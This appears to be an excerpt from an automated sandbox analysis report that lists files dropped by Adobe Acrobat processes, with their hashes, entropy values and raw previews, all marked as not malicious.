                                                                                                          Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):324
                                                                                                          Entropy (8bit):5.167274945674227
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:iOsxKQfV34q2Pwkn2nKuAl9OmbzNMxIFUtSxK2t3JZmwAxK0FDkwOwkn2nKuAl9c:7oxfevYfHAa8jFUtqD/slt5JfHAa84J
                                                                                                          MD5:C016C10338F8EF84B61E554E3D3C395F
                                                                                                          SHA1:E9FB624DE626E9AD7747F2B72D86620D81B97AA2
                                                                                                          SHA-256:C57EB5FFC26E68D62A550063C393FBA645D72A26FAF621515235915884E24890
                                                                                                          SHA-512:8B57D42A8BA46B3867D18C57E3A6F5969BA64BCA1EC1AF7F969508EEDC1024CD375FBE83B05AAF718417B447F65B9DECAB32DA7CB590C50CF88CCE74705B9CC6
                                                                                                          Malicious:false
                                                                                                          Preview:2025/01/06-06:06:22.895 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/06-06:06:22.897 1c80 Recovering log #3.2025/01/06-06:06:22.899 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):324
                                                                                                          Entropy (8bit):5.167274945674227
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:iOsxKQfV34q2Pwkn2nKuAl9OmbzNMxIFUtSxK2t3JZmwAxK0FDkwOwkn2nKuAl9c:7oxfevYfHAa8jFUtqD/slt5JfHAa84J
                                                                                                          MD5:C016C10338F8EF84B61E554E3D3C395F
                                                                                                          SHA1:E9FB624DE626E9AD7747F2B72D86620D81B97AA2
                                                                                                          SHA-256:C57EB5FFC26E68D62A550063C393FBA645D72A26FAF621515235915884E24890
                                                                                                          SHA-512:8B57D42A8BA46B3867D18C57E3A6F5969BA64BCA1EC1AF7F969508EEDC1024CD375FBE83B05AAF718417B447F65B9DECAB32DA7CB590C50CF88CCE74705B9CC6
                                                                                                          Malicious:false
                                                                                                          Preview:2025/01/06-06:06:22.895 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/06-06:06:22.897 1c80 Recovering log #3.2025/01/06-06:06:22.899 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                          Category:dropped
                                                                                                          Size (bytes):71190
                                                                                                          Entropy (8bit):4.663390715133344
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:vr6yY+iC02ZkHKpMWCb57N5DD9F6xLy1+GmRcsV7TW2y/IONnb4JY:vr6yYBdnb5BVS8rs0gO
                                                                                                          MD5:44F75FC66F5B1995537041F20D909E7F
                                                                                                          SHA1:16BE1D74A90E65D894A45794711860E8FE8E87A4
                                                                                                          SHA-256:E680D3E4B9D127315A36295AE151E9C0F5E281E3E4A71EDDCA981555496A158E
                                                                                                          SHA-512:1A9FB2AC9D0DD7E33D501B667C5962F59BDA57F82E37D19B1B05A3B356F796C1B69872EF7FEBD8F45C0D9CA587FD45DB4F1B94F39E03D665AA6AC8F15B020752
                                                                                                          Malicious:false
                                                                                                          Preview:BM........6...(...u...h..... .............................ppp.qqq.utt.uvv.vvv.vvv.vvv.vvv.vvv.uuu.uuu.ttt.tut.nnn.kif.mji.lkk.lkk.lkk.lkk.lkk.lkk.ihh.ddc.jii.ppp.noo.ooo.qqq.qqo.ooo.oon.nnn.ooo.ppp.ooo.qqq.qrr.qrr.pqq.opp.ooo.ppp.opp.lmm.mmm.ooo.mnn.nnn.ooo.noo.qqq.qqq.ooo.pqq.uuu.rrr.mnn.mmm.rss.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.uuu.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.uuu.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.vvv.uwu.uvu.uvv.uvv.uvv.uvv.uvv.uvv.uvv.uvv.....kll.onn.xxx.{||.|||.|||.|||.|||.|||.|||.zzz.ttt.uvt.qpo.lif.omk.qoo.qoo.qoo.qoo.pno.pnn.hgf.`^].mlk.stt.kml.kkk.nnm.jjj.hhh.jig.iig.ggg.iii.ghh.jll.prr.oqp.jll.ijj.hhh.lll.npp.cee.fgg.hjj.fgg.hhh.hhh.hji.oqp.noo.hjj.lnm.xxx.rss.ghh.dff.qrr.{{{.|||.|||.|||.|||.|||.|||.}}}.}}}.}}}.|||.|||.}}}.|||.|||.|||.}}}.}}}.|||.|||.|||.}}}.|||.|||.|||.|||.|||.|||.|||.|||.|||.|||.}}}.}}}.}}}.}}}.|||.|||.|||.}}}.}}}.|||.|||.}}}.|||.|||.|||.}}}.|||.|||.|||.|||.|||.}}}.|||.|||.....^__.ef
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                          Category:dropped
                                                                                                          Size (bytes):86016
                                                                                                          Entropy (8bit):4.445029438418051
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:yezci5tYiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r/s3OazzU89UTTgUL
                                                                                                          MD5:44C9C460280B2A42384682BF2CB0B9B3
                                                                                                          SHA1:DA21ED12094DE76730FA9ED342BB809AF2C9335A
                                                                                                          SHA-256:1BEF583F5951A329B7D57C850D02CB829F75660B41B036E4CA5BA5DB58FDB15A
                                                                                                          SHA-512:84D8968F6D447643293C629ACAA9EB3F3AAB3F59B125AC99D50560F3694B7972853093C05C0C27D7E6BE00BC168256D91B2B30F7D6CD68164A8C9D6919BC2F20
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:SQLite Rollback Journal
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8720
                                                                                                          Entropy (8bit):3.771520555971567
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7Mop/E2ioyVSjioy9oWoy1Cwoy1fQKOioy1noy1AYoy1Wioy1hioybioy5Moy1nj:7vpjuSjF8UXKQWe8b9IVXEBodRBkU
                                                                                                          MD5:215E9AAA4F2A27EF0EA4AD56AF416B7C
                                                                                                          SHA1:D0C85701FC7D55AE02348EACD810FE363E73188D
                                                                                                          SHA-256:8D987D2048C50033E1BB2E61FB59AE04331FEE6B799E8F169EC3B47EB5923C0F
                                                                                                          SHA-512:CF7A04C6438619396FF227C468A4E16BE45A1D6EFA13E160D0E99835AF4E151E1DB168FAE7AF59955DC40A13450B8D7C0298809D11332C23538A7228F3B3DA8C
                                                                                                          Malicious:false
                                                                                                          Preview:.... .c.....5tU................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:Certificate, Version=3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1391
                                                                                                          Entropy (8bit):7.705940075877404
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                          Malicious:false
                                                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                          Category:dropped
                                                                                                          Size (bytes):71954
                                                                                                          Entropy (8bit):7.996617769952133
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                          Malicious:false
                                                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):192
                                                                                                          Entropy (8bit):2.766862344522533
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:kkFklK/TNNl1fllXlE/HT8kOjNNX8RolJuRdxLlGB9lQRYwpDdt:kKTLYT8bNMa8RdWBwRd
                                                                                                          MD5:3F9FE4471960E6A3967F410326AF554D
                                                                                                          SHA1:7288F9DB36745E03EF241215D062F3285E6F7CF4
                                                                                                          SHA-256:1AAF6D8485F48B464F862EDAB30761040BBACA04CCFD0F350452FFEAACD19549
                                                                                                          SHA-512:726CB7F2DD4CB8C01560EEAC613B2E52B7BACABF1AD694A1B19FB547F76C388B0ED2F6DD231017D53AD41F217254C0EEF53287F2B270CC8BDBAFA78395B7F60B
                                                                                                          Malicious:false
                                                                                                          Preview:p...... ............+`..(....................................................... ..........W.....8..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):328
                                                                                                          Entropy (8bit):3.233401259015598
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:kKPGn9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HG2DImsLNkPlE99SNxAhUe/3
                                                                                                          MD5:A7436647FF93A4302158BD3B569F5DB3
                                                                                                          SHA1:E6F31237B65E1B740A42B7EAC51FBC04F3BD4816
                                                                                                          SHA-256:B43525E9A512DC8D8CA409DF6BF52ACD6F7963EF35F16D921231F7A26F5848D8
                                                                                                          SHA-512:43972DA0AC4037DCEC947BCBBEC77C4D4F9459969B00101F66201529EC76563424A571961D00415F80C4B3E9A393F35094DFEB06557117C46324F63CB9C620B8
                                                                                                          Malicious:false
                                                                                                          Preview:p...... ........+.31+`..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1233
                                                                                                          Entropy (8bit):5.233980037532449
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1233
                                                                                                          Entropy (8bit):5.233980037532449
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1233
                                                                                                          Entropy (8bit):5.233980037532449
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10880
                                                                                                          Entropy (8bit):5.214360287289079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:PostScript document text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10880
                                                                                                          Entropy (8bit):5.214360287289079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                          Malicious:false
                                                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):247234
                                                                                                          Entropy (8bit):3.3245480448633247
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:mKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqUrRo+RQn:TPClJ/3AYvYwglFo+RQn
                                                                                                          MD5:F7B75939ED43CD13BC5FA5A7E72C9C16
                                                                                                          SHA1:2FB9185CFEB8001598A301C83ECA9948420007ED
                                                                                                          SHA-256:2D50A4E5C21D7154373C0DF9DAF523FF54E48551510828BDD08D0E3B24125055
                                                                                                          SHA-512:E7AB73FFC3402C06D67410C52140A801A7FCBA9B8D248F6C6A069A31FB14437B347BB2973DE361B395E49E50A0A11E515F3E9EC1A73B568421B64E059B883758
                                                                                                          Malicious:false
                                                                                                          Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4
                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:e:e
                                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                          Malicious:false
                                                                                                          Preview:....
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2145
                                                                                                          Entropy (8bit):5.066732581555425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Yn2sL0/EY0bMSlMtCM5mMOpiMAW0MretMSMmkaMY:jv/SYtt55V6AWLre6JmkhY
                                                                                                          MD5:EC2800DD79D09B03D399239201FD445F
